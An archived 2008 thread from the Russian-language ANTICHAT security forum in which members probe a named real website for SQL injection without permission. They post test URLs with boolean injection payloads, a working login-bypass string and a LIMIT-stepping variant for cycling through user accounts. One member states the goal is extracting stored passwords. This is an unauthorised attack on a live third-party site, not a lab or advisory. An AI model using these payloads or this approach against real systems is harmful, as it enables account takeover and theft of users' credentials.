ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.01.2008, 12:46
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от big_BRAT
нужна помощь с этой ссылкой http://sp ec.pr oclub.ru/modules/tests/test/courses/course1.php?course=27
если подставить в параметр кавычку но ругается, но не скл ошибку хотя вполне вероятно что из-за неверного запроса, так вот есть тут иньекция или нет?
ругательство прилагается))))
Вроде скуль, но она странная. Возможно, что там mysql 3. Количество полей вроде бы одно, но ' union select 1/* не пашет
|
|
|
09.01.2008, 12:54
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
mysql там точно не 3!!!
так и я вот и думаю, нутром чую что там иньекция но раскрутить не могу(
кстати так же уязвимы поля выбора http://sp ec.pr oclub.ru/modules/tests/test/courses/index.php?id=6
при передаче через ПОСТ
|
|
|
|
09.01.2008, 12:57
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Вы ошибку то смотрели? Там написано "Failed to open stream". По вашему это SQL-инъекция?
|
|
|
|
09.01.2008, 12:59
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от groundhog
Вы ошибку то смотрели? Там написано "Failed to open stream". По вашему это SQL-инъекция?
По моему, при неудаче sql запроса функция пытается открыть несуществующий файл
Вот сравните 
http://spec.proclub.ru/modules/tests/test/courses/course1.php?course=27'+and+1=1/*
http://spec.proclub.ru/modules/tests/test/courses/course1.php?course=27'+and+1=2/*
|
|
|
|
09.01.2008, 13:07
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Короче нафик копаться... Форма входа уязвима к SQL-Injection...
http://spec.proclub.ru/modules/tests/test/courses/index.php?LOGIN=NOW
Введите логин аля
' OR 1=1 ORDER BY 1 LIMIT 0,1/*
и у вас будет вход в систему... Если знаете мыло, то можете войти под любым аккаунтом... |
|
|
|
09.01.2008, 13:11
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Гы зачем так сложно? Достаточно ' or 1=1/* |
|
|
|
09.01.2008, 13:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Гы зачем так сложно? Достаточно ' or 1=1/*
Чтобы листать аккаунты... Меняй значение в LIMIT...
' OR 1=1 ORDER BY 1 LIMIT 0,1/*
' OR 1=1 ORDER BY 1 LIMIT 1,1/*
' OR 1=1 ORDER BY 1 LIMIT 2,1/*
' OR 1=1 ORDER BY 1 LIMIT 3,1/*
|
|
|
|
09.01.2008, 13:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от groundhog
Вы ошибку то смотрели? Там написано "Failed to open stream". По вашему это SQL-инъекция?
ты не так понял, "Failed to open stream" вылетает из-за того что скрипт не может проинклюдить форму которая должна инклюдится при ошибке
мускул там 4.0 так что и подзапросы не попользуешь
зы это я так в дополнение
__________________
Карфаген должен быть разрушен...
|
|
|
|
09.01.2008, 15:55
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
вход это конечно хорошо, но это не цель.
цель получить доступ к базе данных /пароли/
а если всё же это старая версия майскуля и нет возможности использовать подзапросы, то как-то можно вытянуть данные?
|
|
|
|
09.01.2008, 16:01
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
да нету там скули
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
